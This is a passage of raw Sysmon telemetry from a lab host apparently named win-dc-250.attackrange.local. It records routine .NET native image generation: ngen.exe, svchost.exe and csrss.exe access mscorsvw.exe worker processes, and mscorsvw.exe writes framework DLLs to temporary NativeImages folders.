13:26:03.370{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466B-6000-4304-000000009A01}3024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:03.307{08A6967A-466A-6000-4204-000000009A01}4380C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\111c-0\System.AddIn.dll2021-01-14 13:26:03.307 10341000x80000000000000008400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.901{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466C-6000-4B04-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.885{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466C-6000-4B04-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.885{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466C-6000-4B04-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:04.823{08A6967A-466C-6000-4A04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e68-0\System.ComponentModel.DataAnnotations.dll2021-01-14 13:26:04.823 10341000x80000000000000008396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.698{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466C-6000-4A04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.682{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-466C-6000-4A04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.682{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466C-6000-4A04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.604{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466C-6000-4904-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.589{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466C-6000-4904-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.589{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466C-6000-4904-000000009A01}3296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:04.526{08A6967A-466C-6000-4804-000000009A01}2520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9d8-0\System.ComponentModel.Composition.Registration.dll2021-01-14 13:26:04.526 10341000x80000000000000008389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.417{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466C-6000-4804-000000009A01}2520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.401{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-466C-6000-4804-000000009A01}2520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.401{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466C-6000-4804-000000009A01}2520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.339{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466C-6000-4704-000000009A01}1472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.323{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-466C-6000-4704-000000009A01}1472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:04.323{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466C-6000-4704-000000009A01}1472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:04.245{08A6967A-466B-6000-4604-000000009A01}3700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e74-0\System.ComponentModel.Composition.dll2021-01-14 13:26:04.245 10341000x80000000000000008410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.495{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466D-6000-4E04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.479{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-466D-6000-4E04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.479{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466D-6000-4E04-000000009A01}4840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.198{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-466D-6000-4D04-000000009A01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.182{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-466D-6000-4D04-000000009A01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:05.182{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-466D-6000-4D04-000000009A01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4